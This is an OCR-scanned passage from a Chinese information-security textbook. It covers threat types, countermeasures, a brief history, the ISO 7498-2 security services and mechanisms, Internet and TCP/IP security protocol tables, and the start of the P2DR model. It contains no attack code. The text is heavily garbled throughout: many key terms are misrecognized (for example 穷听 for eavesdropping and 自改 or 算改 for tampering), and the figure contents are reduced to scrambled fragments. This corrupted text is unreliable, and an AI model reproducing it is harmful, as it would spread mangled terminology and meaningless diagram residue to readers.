信息 通过 旁 路 传输 绕 过 正常 认证 机 制 。 

(3) 授权 侵犯 。 被 授权 以 某 一 目的 使 用 某 一 系统 或 资源 的 某 个 人 , 却 将 此 权限 用 于 其 
他 未 授权 目的 ;或 者 未 经 授权 的 实体 获得 了 某 个 对 象 的 服务 或 资源 ,通常 是 通过 在 不 安全 通 
道上 截获 正在 传输 的 信息 或 者 利用 对 象 的 固有 弱点 来 实现 的 。 

(4) 陷 门 。 在 某 个 系统 或 某 个 文件 中 设置 的 “机 关 ”, 使 得 当 提 供 特定 的 输入 数据 时 , 允 
许 违反 安全 策略 。 

(5) 拒绝 服务 (DoS)。 对 信息 或 其 他 资源 的 合法 访问 被 无 条 件 地 拒绝 或 推迟 与 时 间 密 
切 相关 的 操作 。DoS 表现 为 服务 的 中 断 , 系 统 的 可 用 性 遭 到 破坏 。 中 断 原因 可 能 是 对 象 被 
破坏 或 暂时 性 不 可 用 。 任 何 连接 到 因特网 并 提供 基于 TCP 网 络 服务 的 系统 (比如 Web 服 
务 器 .FTP 服务 器 或 邮件 服务 器 ) 都 是 拒绝 服务 攻击 的 潜在 目标 。 

(6) 否认 (抵赖 )。 在 一 次 通信 中 涉及 的 那些 实体 之 一 事后 不 承认 参加 了 该 通信 的 全 部 
或 一 部 分 , 称 为 否认 。 否 认 将 会 导致 严重 的 争执 ,造成 责任 混乱 。 

(7) 穷 听 。 人 窃听 的 结果 是 信息 泄露 。 窃 听 可 通过 物理 搭 线 , 拦 截 广播 数据 包 、 后 门 、 接 
收 辐射 信号 实施 。 对 窃听 的 预防 非常 困难 ,发 现 穷 听 几乎 不 可 能 。 

(8) 自 改 。 非 授权 者 用 各 种 手段 对 信息 系统 中 的 数据 进行 增加 、 删 改 ,插入 等 非 授权 操 
作 , 破 坏 数据 的 完整 性 ,以 达到 其 恶意 自 改 的 目的 。 当 所 传送 的 内 容 被 改变 而 未 发 觉 并 导致 
一 种 非 授权 后 果 时 称 为 消息 簧 改 。 

(9) 复制 与 重 放 ( 重 演 ) 。 当 一 个 消息 或 部 分 消息 为 了 产生 非 授权 效果 而 被 重复 时 称 为 
重 放 。 其 实现 方法 是 非 授权 者 先 记 录 系 统 中 的 合法 信息 ,然后 在 适当 的 时 候 进 行 重 放 , 以 扰 
乱 系统 的 正常 运行 或 达到 其 恶意 目的 。 由 于 记录 的 是 合法 信息 ,因而 如 果 不 采取 有 效 措施 ， 
将 难以 辨认 真 伪 。 恶 意 系统 可 以 复制 一 个 实体 或 实体 产生 的 信息 ,如 截获 订单 ,然后 反复 发 
出 订单 。 

(10) 业务 流量 流向 分 析 。 非 授权 者 在 信息 网 络 中 通过 业务 流量 或 业务 流向 分 析 来 扒 
测 信息 网 络 或 整体 部 署 的 敏感 信息 。 可 通过 业务 填充 来 防御 这 种 攻击 。 

(11) 人 为 失误 。 最 常见 的 事故 一 般 是 人 为 失误 。 一 个 授权 的 人 为 了 金钱 或 利益 或 由 
于 粗心 将 信息 泄露 给 一 个 未 授权 的 人 。 人 为 错误 ,意外 事故 、 朴 漏 错误 或 权限 错误 预防 非常 
困难 。 

(12) 自然 灾害 与 人 为 破坏 。 如 雷电 、 地 震 、 火 灾 、 水 灾 、 恐 怖 活动 和 战争 等 。 

(13) 恶意 代码 。 软 件 中 含有 一 个 难以 觉察 的 或 看 似 无 害 的 程序 段 , 当 它 被 执行 时 ,会 
破坏 系统 及 用 户 的 安全 性 。 恶 意 代 码 包括 病毒 .蠕虫 .特洛伊 木 马 、 逻 辑 炸弹 后门 .恶意 
ActiveX 控件 以 及 Web 脚本 间谍 软件 .恶意 广告 插件 等 。 

(14) 不 良 信息 。 互 联网 给 人 们 的 工作 学习、 生活 带 来 了 极 大 便利 ,但 在 信息 的 海洋 中 
还 夹杂 着 一 些 不 良 内 容 , 包 括 色情 .暴力 .毒品 . 收 教 和 赌博 等 。 内 容 安全 是 信息 安全 在 法 
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律 .政治 ,道德 层次 上 的 要 求 , 要 符合 国家 法 律 ,政治 上 健康 ,符合 道德 规范 。 技 术 上 控制 内 
容 安 全 就 是 对 信息 的 访问 和 流动 进行 选择 控制 ,通常 的 做 法 就 是 拦截 .过 滤 或 屏蔽 不 良 
信息 。 

(15) 其 他 。 包 括 信息 截获 /修改 、 信 息 泄 露 .完整 性 破坏 ,资源 耗 尽 等 。 

3. 信息 安全 威胁 的 应 对 措施 

近 几 年 来 ,围绕 网 络 信息 安全 的 问题 提出 了 很 多 的 解决 办 法 ,例如 数据 加 密 技术 、 防 火 
墙 技术 、 安 全 审计 技术 ,安全 管理 技术 和 系统 漏洞 检测 技术 等 ,常用 的 安全 管理 措施 如 图 1. 4 
所 示 , 使 用 的 安全 产品 如 图 1.5 所 示 。 
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图 1.4 常用 的 安全 管理 措施 ( 自 左 至 右 的 柱状 对 应 自 上 而 下 的 说 明 ) 
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图 1.5 应 用 最 广泛 的 安全 产品 ( 自 左 至 右 的 柱状 对 应 自 上 而 下 的 说 明 ) 
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应 对 信息 安全 威胁 的 主要 措施 如 下 : 

(1) 物理 措施 。 保 护 网 络 关键 设备 ,制定 严格 的 网 络 安全 规章 制度 ,采取 防 辐射 防火 
以 及 安装 不 间断 电源 等 措施 。 

(2) 使 用 防火 墙 。 目 前 技术 最 为 复杂 而 且 安 全 级 别 最 高 的 防火 墙 是 隐蔽 智能 网 关 , 它 
将 网 关 隐藏 在 公共 系统 之 后 使 其 免 遭 直接 攻击 。 隐 项 智能 网 关 提 供 了 对 互联 网 服务 进行 几 
乎 透明 的 访问 ,同时 阻止 了 外 部 未 授权 访问 和 对 专用 网 络 的 非法 访问 。 

(3) 访问 控制 。 对 用 户 访问 网 络 资源 的 权限 进行 严格 的 认证 和 控制 。 

(4) 数据 加 密 。 对 网 络 中 传输 的 数据 进行 加 密 , 到 达 目 的 地 后 再 解密 还 原 为 原始 数据 ， 
目的 是 防止 非法 用 户 截获 后 次 用 信息 。 

(5) 病毒 检测 与 防护 。 在 企业 培养 集体 防毒 意识 ,部 署 统一 的 防毒 策略 ,高 效 、 及 时 地 
应 对 病毒 的 入侵 。 

(6) 其 他 措施 。 其 他 措施 包括 信息 过 滤 容错、 数据 镜像 数据 备份 和 审计 等 。 

4. 信息 安全 的 国内 外 研究 历史 与 现状 

信息 安全 几乎 和 人 类 的 书写 语言 一 样 古老 。 古 埃及 法 老 的 幕 葬 里 就 曾经 发 现 过 用 密码 
书写 的 文字 资料 。 古 印度 文字 Kama Sutra 里 记载 有 对 加 密 方法 的 描述 。 在 第 一 次 世界 大 
战 中 ,英国 破译 了 名 为 “Zimmerman 电报 ?的 密码 情报 保证 了 协约 国 赢得 战争 的 胜利 。 

现代 意义 上 的 信息 安全 ,是 在 20 世纪 提出 的 。20 世纪 70 年 代 初 ,美国 (Bell & 
Padula) 提 出 了 计算 机 保密 模型 。20 世纪 80 年 代 , 美 国 制定 了 “可 信 计 算 机 系统 安全 评价 
准则 (TCSEC)”; 比 较 复杂 且 拥 有 较 强 的 加 密 能 力 的 加 密 算法 开始 出 现 。 当 代 , 信 息 安全 得 
到 了 全 面 迅猛 的 发 展 ,信息 安全 的 概念 得 到 了 深化 。20 世纪 90 年 代 , 欧 洲 提出 了 “信息 技 
术 安 全 评价 准则 (ITSEC)”, 近 年 来 ,西方 七 国 提出 了 “信息 技术 安全 评价 通用 准则 (CC for 
ITSEC)”。1999 年 5 月 ,ISO 正式 提出 了 信息 安全 的 国际 标准 作为 信息 安全 重要 组 成 部 分 
的 加 密 技术 和 密码 算法 取得 了 丰硕 的 成 果 。 关 于 信息 安全 的 框架 ,提出 了 系统 的 理论 体系 。 
网 络 安全 协议 不 断 推出 ,形式 化 系统 的 局 限 性 不 断 被 发 现 , 仍 处 于 提高 之 中 。 开 放 源 代码 的 
安全 的 操作 系统 不 断 推出 。 数 字 化 隐 写 技术 在 当代 技术 的 推动 下 取得 大 的 突破 ,得 到 了 广 
泛 的 应 用 。DNA 密码 编码 和 密码 分 析 取 得 巨大 的 突破 ,将 有 可 能 成 为 新 的 密码 编码 和 分 析 
的 理论 依托 。 量 子 密码 技术 的 理论 和 应 用 研究 开展 的 十 分 热烈 有望 取得 不 小 的 成 就 。 现 
在 丰富 的 信息 安全 产品 进入 市 场 ;网 络 防火 墙 的 技术 日 益 成 熟 ;硬件 加 密 卡 广泛 应 用 ;VPN 
技术 形成 产业 ;CA 认证 的 体系 已 经 建立 起 来 ;人 侵 检测 和 漏洞 扫描 知识 库 十 分 丰富 ; 反 病 
毒 技 术 和 伪装 产品 得 到 了 大 规模 的 应 用 。 

而 我 国信 息 安 全 的 整体 防范 技术 水 平 较 差 ;信息 安 全 法 制 建设 正在 健全 ,依法 管理 力度 
不 够 ;正在 从 通信 安全 ,计算机 数据 保密 向 信息 安全 、 系 统 安全 转变 。 我 国信 息 安 全 问题 正 
变 得 日 益 严峻 : 信息 系统 及 网 络 经 常 出 现 被 人 侵 和 瘫痪 ,网 上 内 容 与 与 论 失控 (色情 、 政 治 、 
商业 攻击 ), 网 上 信息 引发 社会 危机 (网 络 水 军 ); 有 组 织 的 网 络 犯罪 (虚拟 财产 与 货币 汇通 )。 

我 国信 息 安全 的 战略 目标 是 保证 国民 经 济 基础 设施 的 信息 安全 ,抵御 有 关 国 家 、 地 区 、 
集团 可 能 对 我 国 实施 “信息 战 ”的 威胁 和 打击 以 及 国内 外 的 高 技术 犯罪 ,保障 国家 安全 ,社会 
稳定 和 经 济 发 展 。 重 点 任务 是 支持 国民 经 济 中 的 国家 关键 基础 设施 的 信息 安全 建设 和 运 
作 , 包 括 金融 ,银行 税收 ,能 源 生产 储备 ,粮油 生产 储备 ,水 电气 供应 、 交 通 运输 .邮电 通信 、 
广播 电视 .商业 贸易 等 国家 关键 基础 设施 。 


1.2 信息 安全 体系 结构 


信息 安全 体系 结构 定义 为 实现 以 下 功能 的 实体 : 提供 未 定义 环境 的 概念 上 的 安全 定义 
和 结构 ;在 环境 内 可 以 独立 设计 安全 组 件 ; 说 明 安全 独立 组 件 应 该 如 何 集成 在 整体 环境 中 ; 
保证 完成 后 的 环境 符合 最 初 建立 的 虚拟 实体 。 信 息 安 全 体系 结构 不 依赖 于 系统 的 存在 ,由 
一 些 构件 或 部 件 组 成 ,包括 基础 、 信 任 和 控制 三 个 部 件 。 

信息 安全 体系 结构 的 重要 性 在 于 安全 体系 结构 同 各 种 元 素 协同 工作 以 保护 信息 的 安全 
性 ,没有 安全 体系 结构 会 使 系统 变 得 很 脆弱 ,一 个 定义 良好 的 安全 体系 结构 能 够 保证 应 用 程 
序 和 系统 的 设计 符合 一 个 标准 的 最 低 安全 级 别 。 


1.2.1 OSI 安全 体系 结构 


国际 标准 组 织 (ISO) 制 定 的 计算 机 信息 系统 互 连 标准 是 目前 国际 上 普遍 遵循 的 ,ISO 
7498-2 确定 了 开放 系统 互 连 (OSI) 参 考 模型 的 信息 安全 体系 标准 。 确 定 了 5 种 基本 安全 服 
务 和 8 种 安全 机 制 , 并 在 OSI 的 7 层 中 有 相对 应 的 关系 ,如 图 1. 6 所 示 。 


应 用 层 a 应 用 层 身份 认证 


会 话 层 | ——— 会 话 层 
> FF 不 可 Sj 

传输 层 一 传输 层 市 到 端的 加 密 

网 络 层 < 一 网 络 层 防火 墙 

(一 IP 加 密 信道 

链 路 层 [EMNR 点 到 点 的 链 路 加 密 
物理 层 Re 物理 层 安全 物理 信道 

t 1 


物理 互 连 介质 
图 1.6 网 络 安全 服务 层次 模型 


1. OSI 安全 体系 结构 一 一 5 种 安全 服务 

OSI 安全 体系 结构 定义 了 身份 认证 ,访问 控制 ,数据 保密 ,数据 完整 性 和 不 可 否认 性 5 
种 安全 服务 。 

(1) 身份 认证 。 身 份 认证 可 以 鉴别 参与 通信 的 对 等 实体 和 数据 源 ( 合 法 性 、 真 实 性 , 防 
假冒 ), 是 授权 控制 的 基础 。 应 该 提供 双向 的 认证 (可 以 是 单 向 的 ) ,一 般 采 用 高 强度 的 密码 
技术 来 进行 身份 认证 。 

(2) 访问 控制 (授权 )。 控 制 不 同 用 户 对 信息 资源 访问 权限 ,授权 单个 用 户 或 用 户 组 , 授 
权 控制 要 求 具有 一 致 性 .统一 性 ;要 求 有 审计 核查 功能 , 尽 可 能 地 提供 细 粒 度 的 控制 ;只 有 授 
权 用 户 才能 按 规则 访问 。 

(3) 数据 保密 (通信 加 密 )。 提 供 数据 保护 ,防止 数据 未 经 授权 (或 被 截取 ) 就 泄露 ;具有 
连接 保密 性 、 无 连接 保密 性 、 选 择 字段 保密 性 ,业务 流 保密 性 ;技术 手段 是 基于 对 称 密 钥 加 密 
的 算法 和 基于 非 对 称 密 钥 的 加 密 算法 。 

(4) 数据 完整 性 。 指 通过 网 上 传输 的 数据 应 防止 被 修改 ,删除 .插入 蔡 换 或 重 发 ,以 保 
证 合法 用 户 接收 和 使 用 该 数据 的 真实 性 ,保证 数据 信息 在 接收 方 和 发 送 方 完全 一 致 。 用 于 


10 


计算 机 系统 安全 概述 


对 付 主动 威胁 即 对 实体 的 主动 攻击 。 处 理 步 又 是 在 发 送 方 给 数据 实体 附加 一 个 分 组 校 验 码 
或 密码 校 验 值 信息 (可 加 密 ) ,在 接收 方 进 行 实体 验证 ,防止 算 改 。 

(5) 不 可 否认 性 。 包 括 源 发 证 明和 交付 证 明 。 源 发 证 明 是 为 数据 的 接收 者 提供 数据 来 
源 的 证 据 , 用 来 防止 发 送 数据 方 发 送 数据 后 否认 自己 发 送 过 数据 ;交付 证 明 是 为 数据 的 发 送 
者 提供 数据 交付 证 据 , 用 来 防止 接收 方 接收 数据 后 否认 自己 收 到 过 数据 。 电 子 签名 的 主要 
目的 是 防止 抵赖 防止 否认 ,给 仲裁 提供 证 据 。 防 止 否认 对 金融 电子 化 系统 很 重要 。 

2. OSI 安全 体系 结构 一 一 8 类 安全 机 制 

OSI 安全 体系 结构 定义 了 数据 加 密 、. 数 字 签名 .访问 控制 .数据 完整 性 ,鉴别 交换 .业务 
填充 .路 由 控制 和 公证 8 类 安全 机 制 。 安 全 机 制 . 安 全 服务 与 OSI 网 络 参 考 模 型 构成 一 个 
三 维 的 安全 体系 结构 ,如 图 1.7 所 示 。 


os 者 
7 一 | 应 用 层 
6 一 | 表示 层 
5 一 | 会 话 层 
4 一 | 传输 层 
3 一 网 络 层 
2 一 | 数据 链 路 层 
i 安全 机 制 

鉴别 服务 [1TTTI [~ 
访问 控制 加 数 访 数 鉴 业 路 公 
数据 保密 性 名 制 表 护 充 制 
不 可 否认 性 性 
安全 服务 


图 1.7 三 维 的 信息 系统 安全 体系 结构 


(1) 数据 加 密 机 制 。 向 数据 和 业务 信息 流 提 供 保密 性 ,对 其 他 安全 机 制 起 补充 作用 ， 
实现 数据 安全 存储 和 安全 传输 ,实现 身份 鉴别 .数据 完整 性 ,不 可 否认 性 等 特性 ;防止 信息 的 
未 授权 读 取 和 修改 ,抵赖 、 否 认 和 伪造 ,以 及 通信 业务 流 分析 。 加 密 算法 有 对 称 加 密 、 非 对 称 
加 密 和 对 密 钥 的 管理 。 

(2) 数字 签名 机 制 。 实 现 抗 抵赖 和 不 可 否认 服务 及 鉴别 对 方 身份 真实 性 等 ,发 送 者 不 
能 否认 签名 、 接 收 者 不 能 伪造 签名 ;决定 于 对 数据 单元 签名 和 验证 签 过 名 的 数据 单元 两 个 过 
程 。 特 征 是 只 有 利用 签名 者 的 私 钥 信息 才能 产生 签名 。 

(3) 访问 控制 机 制 。 实 施 对 资源 的 访问 加 以 限制 的 策略 , 即 规定 不 同 主体 对 不 同 客体 
的 操作 权限 ,目的 是 只 允许 被 授权 用 户 访问 敏感 资源 ,拒绝 未 授权 用 户 的 访问 。 利 用 访问 控 
制 矩阵 .口令 ,能力 表 等 说 明 用 户 的 访问 权限 ,可 用 于 通信 连接 的 任何 一 端 或 用 在 中 间 连 接 
的 任何 位 置 。 

(4) 数据 完整 性 机 制 。 包 括 单个 的 数据 单元 或 字段 的 完整 性 .数据 单元 串 或 字段 串 的 
完整 性 ,对 于 连接 形式 的 数据 传输 使 用 编 序 保护 形式 ,无 连接 的 数据 传输 使 用 时 标的 保护 形 
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式 。 各 种 信息 流 错误 检验 、 校 验 等 技术 。 

(5) 鉴别 交换 机 制 。 通 过 信息 交换 以 确认 实体 身份 的 机 制 ,利用 密码 技术 时 可 同 握手 
协议 结合 ,如 结合 使 用 时 标 和 同步 时 钟 与 双向 \ 三 向 握手 协议 。 利 用 数字 签名 实现 的 不 可 否 
认 服 务 , 当 交换 信息 的 双方 和 通信 手段 均 可 信任 时 ,可 通过 口令 来 鉴别 ; 当 交 换 信息 双方 可 
信和 而 通信 手段 不 可 靠 时 ,可 由 密码 技术 加 以 保护 ; 当 交 换 信息 双方 互 不 信任 时 ,可 使 用 数字 
签名 等 技术 来 实现 抗 抵赖 服务 。 

(6) 业务 填充 机 制 一 一 抗 信息 流 分 析 。 这 是 一 种 制造 假 的 通信 实例 .产生 欺骗 性 数据 
单元 或 在 数据 单元 中 产生 假 数据 的 安全 机 制 。 它 防止 对 业务 流 分 析 来 获取 情报 ,业务 填充 
只 在 保密 性 服务 时 有 效 。 具 体 实 施 时 应 注意 加 密 和 伪装 ,以 避免 非法 用 户 区 分 出 伪 通 信 业 
务 和 真正 的 通信 业务 。 

(7) 路 由 控制 机 制 。 路 由 既 可 以 动态 选择 ,也 可 以 事先 安排 。 携 带 某 些 安全 标签 的 数 
据 可 能 被 安全 策略 禁止 通过 某 些 子 网 ,中继站 或 链 路 ,连接 的 发 起 者 可 以 请 求 回避 特定 的 子 
网 ,中继站 或 链 路 。 路 由 控制 可 保证 机 密 数 据 只 在 物理 上 安全 或 具有 适当 保护 措施 的 路 由 
上 传输 。 

(8) 公证 机 制 。 通 信 过 程 的 信息 的 完整 性 、 信 源 .通信 时 间 和 目的 地 、 密 钥 分 配 、 数 字 签 
名 等 均 可 以 借助 公证 机 制 加 以 保证 。 公 证 由 第 三 方 提供 , 它 接受 通信 实体 的 委托 ,并 掌握 可 
供 证 明 的 可 信赖 的 所 需 信 息 。 公 证 可 以 是 仲裁 方式 或 判决 方式 的 。 


1.2.2 Internet 安全 体系 结构 


通过 对 Internet 的 安全 策略 要 求 及 风险 分 析 , 整 个 Internet 的 安全 措施 应 按 系统 体系 
建立 。 具 体 的 系统 安全 控制 有 如 下 几 个 方面 : 物理 安全 、 网 络 安全 、 信 息 安全 和 安全 管理 。 

1. 物理 安全 

保证 各 种 设备 的 物理 安全 是 整个 计算 机 信息 系统 安全 的 前 提 。 主 要 包括 环境 安全 、 设 
备 安全 和 媒体 安全 三 个 方面 。 

通常 的 防范 措施 为 对 主机 房 及 重要 信息 存储 收发 部 门 进行 屏蔽 处 理 , 或 采用 光缆 传输 
方式 ,或 采取 主动 式 的 干扰 设备 如 干扰 机 来 破坏 对 应 信息 的 窃取 。 

2. 网 络 安全 

Internet 安全 体系 结构 的 网 络 安全 包括 系统 安全 、 网 络 运行 安全 和 局 域 网 安全 三 个 方 
面 ,如 表 1.1 所 示 。 


表 1.1 Internet 安全 体系 结构 一 一 网 络 安全 


系统 (主机 、 服 务 ) 安 全 反 病 毒 系统 安全 检测 | 入侵 检测 | 审计 分 析 
网 络 安全 | 网 络 运行 安全 备份 与 恢复 应 急 .灾难 恢复 
局 域 网 . 子 网 安全 访问 控制 (防火 墙 ) 网 络 安全 检测 
通常 的 安全 措施 如 下 : 


(1) 内 外 网 隔离 及 访问 控制 系统 。 在 内 部 网 与 外 部 网 之 间 设置 防火 墙 (包括 分 组 过 滤 
与 应 用 代理 等 ) 实 现 内 外 网 的 隔离 与 访问 控制 是 保护 内 部 网 安全 的 最 主要 ,同时 也 是 最 有 
效 、 最 经 济 的 措施 之 一 。 
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防火 墙 具有 控制 访问 的 功能 ,如 过 滤 进 .出 网 络 的 数据 ,管理 进 、 出 网 络 的 访问 行为 , 封 
堵 某 些 禁止 的 业务 ,记录 通过 防火 墙 的 信息 内 容 和 活动 ,对 网 络 攻击 的 检测 和 告警 等 。 防 火 
墙 被 用 来 隔离 内 部 网 络 的 一 个 网 段 与 另 一 个 网 段 ,设置 防火 墙 就 可 以 限制 局 部 网 络 安全 问 
题 对 全 局 网 络 造成 的 影响 ,可 以 隔离 或 控制 不 同安 全 域 的 内 部 网 ,保证 局 部 子 网 的 安全 。 

(2) 网 络 安全 检测 一 一 漏洞 扫描 。 网 络 安全 检测 工具 通常 是 一 个 网 络 安全 性 评估 分 析 
软件 ,其 功能 是 用 实践 性 的 方法 扫描 分 析 网 络 系统 ,检查 报告 系统 存在 的 弱点 和 漏洞 ,建议 
补救 措施 和 安全 策略 ,达到 增强 网 络 安全 性 的 目的 。 分 为 主机 漏洞 扫描 和 网 络 漏洞 扫描 ( 系 
统 脆弱 性 分 析 ) 。 

(3) 审计 与 监控 。 审 计 是 记录 用 户 使 用 计算 机 网 络 系统 进行 所 有 活动 的 过 程 , 它 是 提 
高 安全 性 的 重要 工具 ,能 够 更 迅速 和 系统 地 识别 问题 和 监控 系统 ,并 且 它 是 后 面 事故 处 理 阶 
段 的 重要 依据 。 

(4) 反 病 毒 。 计 算 机 恶意 代码 (有 时 泛称 病毒 ) 的 防范 是 计算 机 系统 安全 性 建设 中 重要 
的 一 环 , 包 括 预 防 病毒 .检测 病毒 .分 析 病 毒 、 隔 离 或 清除 病毒 4 种 技术 。 

(5) 网 络 备份 系统 。 备 份 的 目的 是 当 有 和 运行 故障 或 灾难 时 尽 可 能 快 地 应 急 , 全 盘 恢 复 
运行 计算 机 系统 所 需 的 数据 和 系统 信息 。 

备份 机 制 有 场地 内 高 速度 大 容量 数据 的 自动 存储 、 备 份 与 恢复 ,如 双 工 系统 ;场地 外 的 
数据 存储 、 备 份 与 恢复 ,如 系统 镜像 ;还 有 对 系统 设备 的 备份 。 

3. 信息 安全 

Internet 安全 体系 结构 的 信息 安全 包括 信息 传输 安全 、 信 息 存储 安全 和 信息 内 容 安全 
三 个 方面 ,同时 对 信息 的 使 用 主体 进行 认证 和 授权 ,如 表 1. 2 所 示 。 


表 1.2 Internet 安全 体系 结构 一 一 信息 安全 


信息 传输 安全 (动态 安全 ) 数据 加 密 | 数据 完整 性 的 鉴别 防 抵赖 
这 数据 储存 安全 (静态 安全 ) 数据 库 安全 终端 安全 

信息 内 容 安全 信息 的 防 泄露 .内容 审计 

用 户 鉴别 授权 


(1) 信息 传输 安全 。 信 息 传输 安全 是 防止 通信 线路 上 的 传输 数据 被 窃听 、 泄 露 , 算 改 和 
破坏 ,是 动态 的 数据 安全 。 其 措施 包括 对 传输 中 的 数据 流 加 密 , 有 和 链 路 加 密 、 节 点 加 密 、 端 到 
端 加 密 三 个 不 同 层次 ;对 数据 完整 性 鉴别 如 报 文 鉴别 , 校 验 和 、 加 密 校 验 和 ,消息 完 整 性 编码 
等 ; 防 抵赖 技术 (对 源 和 目的 地 双方 的 证 明 ) 等 。 

(2) 数据 存储 安全 。 存 储 的 数据 是 一 种 静止 的 信息 ,主要 包括 纯粹 的 数据 信息 如 数据 
库 中 的 数据 信息 保护 、 各 种 功能 文件 数据 信息 的 保护 ,数据 存储 设备 终端 的 安全 。 

终端 安全 主要 解决 个 人 计算 机 、 移 动 存储 设备 的 信息 安全 保护 问题 。 数 据 库 安 全 包括 
数据 库 的 物理 完整 性 ,逻辑 完整 性 元素 完 整 性 ,还 有 用 户 鉴 别 . 数 据 的 加 密 、 可 用 性 和 可 审 
计 性 等 。 

(3) 信息 内 容 安全 。 实 时 对 进出 内 部 网 络 或 网 站 公开 发 布 的 信息 进行 内 容 审计 , 以 防 
止 或 追查 可 能 的 泄密 行为 。 因 此 ,为 了 满足 国家 保密 法 的 要 求 ,在 某 些 重要 或 涉 密 网 络 应 该 
安装 使 用 内 容 审计 系统 。 
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(4) 鉴别 与 授权 。 信 息 在 存储 、 传 输 和 使 用 过 程 中 都 与 其 主体 一 一 用 户 有 关 ,为 防止 信 
息 泄露 , 算 改 和 破坏 ,有 必要 对 用 户 进行 授权 。 上 鉴别 是 对 网 络 中 的 主体 进行 验证 的 过 程 ,是 
认证 信息 使 用 主体 身份 的 主要 方法 。 验 证 主体 身份 有 口令 机 制 , 智 能 卡 和 主体 特征 (包括 指 
纹 、 视 网 膜 声音 和 手 型 等 特征 ) 三 种 方法 。 授 权 是 对 使 用 信息 的 主体 授予 适当 的 访问 权限 。 

4. 安全 管理 

除了 完善 系统 的 安全 保密 措施 外 ,还 必须 花 大 力气 加 强 网 络 的 安全 管理 。 安 全 管理 主 
要 基于 三 个 原则 : 多 人 负责 原则 、 任 期 有 限 原则 和 职责 分 离 原 则 。 


1.2.3 ”基于 TCP/IP 的 网 络 安全 体系 结构 


基于 TCP/IP 的 网 络 安全 体系 结构 是 OSI 安全 体系 在 TCP/IP 网 络 的 具体 实现 ， 
TCP/IP 层 次 模型 对 应 的 协议 如 表 1. 3 所 示 , 具 体 协议 请 参考 其 他 书籍 。 


表 1.3 1SO 7498-2 到 TCP/IP 的 映射 


ISO/OSI 参考 模型 TCP/IP 层次 模型 TCP/IP 体系 
应 用 层 (A) FTP NFS 
TELNET XDR 
表示 层 (P) 应 用 层 
HTTP SMTR 
会 话 层 (S) SNMP RPC 
传输 层 (T) 传输 层 TCP/UDP 
IP ICMP 
网 络 层 (N) IP 层 
ARP、RARP 
数据 链 路 层 (DL) 
网 络 接 口 层 硬件 协议 (不 指定 ) 
物理 层 (PH) 


网 络 接口 层 的 主要 安全 协议 有 PAP(Password Authentication Protocol, 密 码 认证 协 
议 ) .CHAP(Challenge Handshake Authentication Protocol , 挑战 握手 认证 协议 )、PPTP 
(Point-to-Point Tunneling Protocol, 点 对 点 隧道 协议 )、L2F(Level 2 Forwarding protocol， 
第 二 层 转 发 协议 )、L2TP (Layer 2 Tunneling Protocol, 第 二 层 隧道 协议 )、WEP(Wired 
Equivalent Privacy, 有 线 等 效 保密 ) 和 WPA(Wi-Fi Protected Access, WiFi 网 络 保护 访问 ) 。 

网 络 层 的 主要 安全 协议 有 IPSec(IP Security,IP 层 安全 协议 ) 。 

传输 层 的 主要 安全 协议 有 SSL(Secure Socket Layer, 安 全 套 接 字 层 )、TLS(Transport 
Layer Security, 安 全 传输 层 ) 和 SOCKS(Protocol for Sessions Traversal Across Firewall 
Securely, 防 火 墙 安全 会 话 转换 协议 ) 。 

应 用 层 的 主要 安全 协议 有 SSH(Secure Shell Protocol, 安 全 外 这 协议 )、Kerberos、PGP 
(Pretty Good Privacy) .S/MIME ( Secure/Multipurpose Internet Mail Extensions, 安全 的 
多 功能 Internet 电子 邮件 扩充 )、S-HTTP(Secure Hyper Text Transfer Protocol, 安 全 超 文 
本 传输 协议 ) 和 SET(Secure Electronic Transaction ,安全 电子 交易 ) 等 。TCP/IP 参考 模型 
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实现 的 安全 协议 如 表 1.4 所 示 , 具 体 协议 功能 请 参考 其 他 书籍 。 
表 1.4 TCP/IP 参考 模型 的 安全 协议 分 层 
协议 层 针对 的 实体 安全 协议 主要 实现 的 安全 机 制 
S-HTTP 信息 加 密 、 数 字 签 名 ,数据 完整 性 验证 
SET 信息 加 密 、 身 份 认证 ,数字 签名 .数据 完整 性 验证 
司 PGP 信息 加 密 、 数 字 签 名 ,数据 完整 性 验证 
S/MIME 信息 加 密 、 数 字 签 名 ,数据 完整 性 验证 
Kerberos 信息 加 密 、 身 份 认 证 
SSH 信息 加 密 、 身 份 认证 ,数据 完整 性 验证 
三 SSL/TLS 信息 加 密 、 身 份 认证 ,数据 完整 性 验证 
SOCKS 访问 控制 、 穿 透 防火 墙 
网 际 层 主机 IPSec 信息 加 密 、 身 份 认证 数据 完整 性 验证 
PAP 身份 认证 
CHAP 身份 认证 
PPTP 传输 隧道 
网 络 接口 层 端 系统 L2F 传输 隧道 
L2TP 传输 隧道 
WEP 信息 加 密 、 访 问 控制 ,数据 完整 性 验证 
WPA 信息 加 密 、 身 份 认 证 ,访问 控制 数据 完整 性 验证 


1.3 ”信息 安全 模型 与 策略 


1.3.1 信息 安全 模型 


根据 木 桶 理论 ,一 个 桶 能 装 多 少 水 不 取决 于 桶 有 多 高 ,而 取决 于 组 成 该 桶 的 最 短 的 那 块 
木 条 的 高 度 。 所 以 信息 安全 是 一 个 系统 工程 ,涉及 多 个 方面 , 某 一 方面 的 缺陷 会 导致 严重 的 
安全 事故 ,信息 安全 的 实施 必须 按照 一 定 的 理论 模型 。 

信息 安全 模型 包括 一 些 概念 原理、 结构 和 标准 等 ,这 些 是 用 于 设计 、 实 施 、 监 视 操 作 系 
统 、 设 备 .网 络 应 用 的 安全 性 ,同时 它们 可 以 用 来 增强 信息 系统 的 机 密 性 、 完 整 性 和 可 用 性 
等 。 主 要 模型 有 P2DR 模型 . 安 氏 的 PADIMEE™ 模 型 .Bell-LaPadula 保密 性 模型 .Clark- 
Wilson 模型 和 China Wall 模型 等 。 信 息 保 障 策略 (Information Assunarce Technical 
Framework，IATF) 由 美国 国家 安全 局 (NSA) 起 草 颁布 ,在 IATF 中 定义 了 对 一 个 系统 进 
行 信息 保障 的 过 程 以 及 系统 中 所 有 部 件 的 安全 需求 。 

1. P2DR 模型 

P2DR 模型 是 美国 国际 互联 网 安全 系统 公司 (ISS) 最 先 提 出 的 动态 可 适应 安全 模型 ,如 
图 1.8 所 示 , 包 括 Policy (策略)、Protection (防护 )、 Detection (检测 ) 和 Response (响应) 
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4 部 分 。 

按照 P2DR 的 观点 ,一 个 完整 的 动态 安全 体系 ,不 仅 需要 恰当 的 防护 (如 操作 系统 访问 
控制 防火墙 .加密 等 ) ,而 且 需 要 动态 的 检测 机 制 (如 入 侵 检测 ,漏洞 扫描 等 ) ,在 发 现 问题 时 
